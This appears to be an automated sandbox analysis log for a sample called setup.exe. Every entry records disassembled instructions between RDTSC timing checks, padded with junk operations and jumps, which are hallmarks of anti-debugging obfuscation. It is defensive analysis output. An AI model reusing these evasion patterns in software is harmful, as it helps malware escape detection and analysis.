Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8037B second address: 4D803AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov dl, 95h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FF39F404881h 0x00000011 jmp 00007FF32CDD656Eh 0x00000016 test bl, 00000007h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bx, 7F60h 0x00000020 mov edx, 57E2318Ch 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70876 second address: 4D708DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 27h 0x00000005 jmp 00007FF32CFB7204h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f call 00007FF32CFB71FEh 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007FF32CFB71FDh 0x00000020 jmp 00007FF32CFB71FBh 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF32CFB7205h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D708DC second address: 4D709B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6577h 0x00000009 and eax, 27D16CAEh 0x0000000f jmp 00007FF32CDD6579h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov edx, 5274DA0Eh 0x00000021 call 00007FF32CDD656Fh 0x00000026 call 00007FF32CDD6578h 0x0000002b pop esi 0x0000002c pop ebx 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f jmp 00007FF32CDD656Eh 0x00000034 mov esi, dword ptr [ebp+08h] 0x00000037 jmp 00007FF32CDD6570h 0x0000003c sub ebx, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FF32CDD656Ah 0x00000047 and ah, 00000018h 0x0000004a jmp 00007FF32CDD656Bh 0x0000004f popfd 0x00000050 pushfd 0x00000051 jmp 00007FF32CDD6578h 0x00000056 adc cl, 00000078h 0x00000059 jmp 00007FF32CDD656Bh 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D709B7 second address: 4D70A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF32CFB71FFh 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f jmp 00007FF32CFB7202h 0x00000014 je 00007FF39F5ECBA2h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF32CFB71FEh 0x00000021 sub eax, 43B94D38h 0x00000027 jmp 00007FF32CFB71FBh 0x0000002c popfd 0x0000002d mov ah, 67h 0x0000002f popad 0x00000030 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000037 jmp 00007FF32CFB71FBh 0x0000003c mov ecx, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70A27 second address: 4D70A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70A2B second address: 4D70A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70A31 second address: 4D70AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6578h 0x00000009 adc cx, F1F8h 0x0000000e jmp 00007FF32CDD656Bh 0x00000013 popfd 0x00000014 jmp 00007FF32CDD6578h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007FF39F40BE90h 0x00000022 pushad 0x00000023 jmp 00007FF32CDD656Eh 0x00000028 push esi 0x00000029 mov ecx, edx 0x0000002b pop edx 0x0000002c popad 0x0000002d test byte ptr [77436968h], 00000002h 0x00000034 jmp 00007FF32CDD6578h 0x00000039 jne 00007FF39F40BE6Ah 0x0000003f jmp 00007FF32CDD6570h 0x00000044 mov edx, dword ptr [ebp+0Ch] 0x00000047 jmp 00007FF32CDD6570h 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FF32CDD6577h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70AF5 second address: 4D70B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c mov ah, 71h 0x0000000e pop edi 0x0000000f pushfd 0x00000010 jmp 00007FF32CFB7204h 0x00000015 or cl, 00000038h 0x00000018 jmp 00007FF32CFB71FBh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FF32CFB7204h 0x00000027 xor esi, 6FA05A98h 0x0000002d jmp 00007FF32CFB71FBh 0x00000032 popfd 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007FF32CFB7206h 0x0000003b sub eax, 7A5D04F8h 0x00000041 jmp 00007FF32CFB71FBh 0x00000046 popfd 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70B91 second address: 4D70BD8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6578h 0x00000008 and si, 5F58h 0x0000000d jmp 00007FF32CDD656Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF32CDD6575h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70BD8 second address: 4D70BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CFB71FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70BE8 second address: 4D70BFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d push eax 0x0000000e push edx 0x0000000f movzx esi, di 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70BFA second address: 4D70C06 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C06 second address: 4D70C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 pushfd 0x00000008 jmp 00007FF32CDD656Bh 0x0000000d and al, FFFFFFDEh 0x00000010 jmp 00007FF32CDD6579h 0x00000015 popfd 0x00000016 popad 0x00000017 push dword ptr [ebp+14h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF32CDD656Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C75 second address: 4D70C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C79 second address: 4D70C95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6578h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C95 second address: 4D70CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF32CFB7205h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70CBC second address: 4D70CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jmp 00007FF32CDD656Eh 0x0000000f mov esp, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF32CDD6577h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80D7D second address: 4D80D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80D8C second address: 4D80DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, F0h 0x00000005 pushfd 0x00000006 jmp 00007FF32CDD6570h 0x0000000b adc ecx, 6D1D8CD8h 0x00000011 jmp 00007FF32CDD656Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF32CDD6574h 0x00000022 xor ch, 00000038h 0x00000025 jmp 00007FF32CDD656Bh 0x0000002a popfd 0x0000002b mov edi, ecx 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov bx, 3280h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80AD7 second address: 4D80ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80ADD second address: 4D80B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B01 second address: 4D80B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B05 second address: 4D80B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B0B second address: 4D80B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF32CFB7203h 0x00000008 pop ecx 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF32CFB71FCh 0x00000019 jmp 00007FF32CFB7205h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B52 second address: 4D80B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF32CDD6576h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF32CDD656Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B94 second address: 4D80B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4E0073D second address: 4E00765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF32CDD656Bh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CDD6570h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF09EF second address: 4DF09F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF09F3 second address: 4DF0A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A10 second address: 4DF0A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A16 second address: 4DF0A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A1A second address: 4DF0A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A28 second address: 4DF0A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A2E second address: 4DF0A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A32 second address: 4DF0A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF080B second address: 4DF0848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF32CFB71FEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CFB71FEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0848 second address: 4DF085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF085A second address: 4DF0883 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF32CFB7205h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0883 second address: 4DF08A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF32CDD656Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0C27 second address: 4DF0CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CFB7201h 0x00000009 or cx, AB96h 0x0000000e jmp 00007FF32CFB7201h 0x00000013 popfd 0x00000014 movzx ecx, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c movzx esi, dx 0x0000001f call 00007FF32CFB71FBh 0x00000024 pushfd 0x00000025 jmp 00007FF32CFB7208h 0x0000002a or ecx, 048D1E18h 0x00000030 jmp 00007FF32CFB71FBh 0x00000035 popfd 0x00000036 pop eax 0x00000037 popad 0x00000038 mov dword ptr [esp], ebp 0x0000003b jmp 00007FF32CFB71FFh 0x00000040 mov ebp, esp 0x00000042 pushad 0x00000043 mov ebx, esi 0x00000045 mov dx, si 0x00000048 popad 0x00000049 push dword ptr [ebp+0Ch] 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF32CFB7209h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0CCF second address: 4DF0CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0CDF second address: 4DF0CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF32CFB71FAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0CF6 second address: 4DF0D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007FF32CDD656Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e call 00007FF32CDD6569h 0x00000013 jmp 00007FF32CDD6570h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov eax, 37BA5829h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0D2E second address: 4DF0D6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FF32CFB7209h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF32CFB71FCh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0D6E second address: 4DF0D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0D80 second address: 4DF0DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FF32CFB7209h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB71FDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0526 second address: 4DA052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA052C second address: 4DA0530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0530 second address: 4DA05A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c call 00007FF32CDD6570h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF32CDD656Dh 0x0000001f and ax, E536h 0x00000024 jmp 00007FF32CDD6571h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FF32CDD6570h 0x00000030 sbb ecx, 2AE92C58h 0x00000036 jmp 00007FF32CDD656Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05A5 second address: 4DA05A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05A9 second address: 4DA05AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05AF second address: 4DA05F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007FF32CFB7200h 0x00000010 push FDA9B50Dh 0x00000015 jmp 00007FF32CFB7201h 0x0000001a add dword ptr [esp], 79980B0Bh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov bl, ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05F1 second address: 4DA0649 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD656Fh 0x00000008 add ch, FFFFFFDEh 0x0000000b jmp 00007FF32CDD6579h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov edi, esi 0x00000015 popad 0x00000016 call 00007FF32CDD6569h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF32CDD6579h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0649 second address: 4DA0679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CFB7201h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov esi, ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0679 second address: 4DA0731 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6579h 0x00000008 and ax, D986h 0x0000000d jmp 00007FF32CDD6571h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FF32CDD6570h 0x0000001b add ch, 00000028h 0x0000001e jmp 00007FF32CDD656Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007FF32CDD6579h 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 jmp 00007FF32CDD6571h 0x00000035 pop eax 0x00000036 jmp 00007FF32CDD656Eh 0x0000003b mov eax, dword ptr fs:[00000000h] 0x00000041 pushad 0x00000042 mov dx, ax 0x00000045 mov ecx, 176D2139h 0x0000004a popad 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FF32CDD656Eh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0731 second address: 4DA0740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0740 second address: 4DA0747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 94h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0747 second address: 4DA0806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FF32CFB7207h 0x0000000d nop 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF32CFB7204h 0x00000015 add ax, 5808h 0x0000001a jmp 00007FF32CFB71FBh 0x0000001f popfd 0x00000020 push eax 0x00000021 pop ecx 0x00000022 popad 0x00000023 sub esp, 1Ch 0x00000026 pushad 0x00000027 mov esi, edx 0x00000029 mov cx, di 0x0000002c popad 0x0000002d push esi 0x0000002e jmp 00007FF32CFB7202h 0x00000033 mov dword ptr [esp], ebx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FF32CFB71FEh 0x0000003d adc ch, FFFFFFC8h 0x00000040 jmp 00007FF32CFB71FBh 0x00000045 popfd 0x00000046 mov edx, ecx 0x00000048 popad 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d movsx edx, si 0x00000050 pushfd 0x00000051 jmp 00007FF32CFB7208h 0x00000056 xor ecx, 77A45258h 0x0000005c jmp 00007FF32CFB71FBh 0x00000061 popfd 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0806 second address: 4DA084F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CDD6571h 0x0000000f xchg eax, esi 0x00000010 jmp 00007FF32CDD656Eh 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 mov eax, 3666D7ADh 0x0000001c push eax 0x0000001d push edx 0x0000001e mov edx, esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA084F second address: 4DA0877 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 1B0168EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov cl, dl 0x0000000e mov esi, 576EE9BFh 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB7201h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0877 second address: 4DA0919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [7743B370h] 0x0000000e jmp 00007FF32CDD656Eh 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 pushad 0x00000017 movzx ecx, dx 0x0000001a call 00007FF32CDD6573h 0x0000001f pushad 0x00000020 popad 0x00000021 pop esi 0x00000022 popad 0x00000023 xor eax, ebp 0x00000025 pushad 0x00000026 mov al, 9Eh 0x00000028 popad 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FF32CDD6572h 0x00000030 jmp 00007FF32CDD6572h 0x00000035 popad 0x00000036 mov dword ptr [esp], eax 0x00000039 jmp 00007FF32CDD6570h 0x0000003e lea eax, dword ptr [ebp-10h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF32CDD6577h 0x00000048 rdtsc
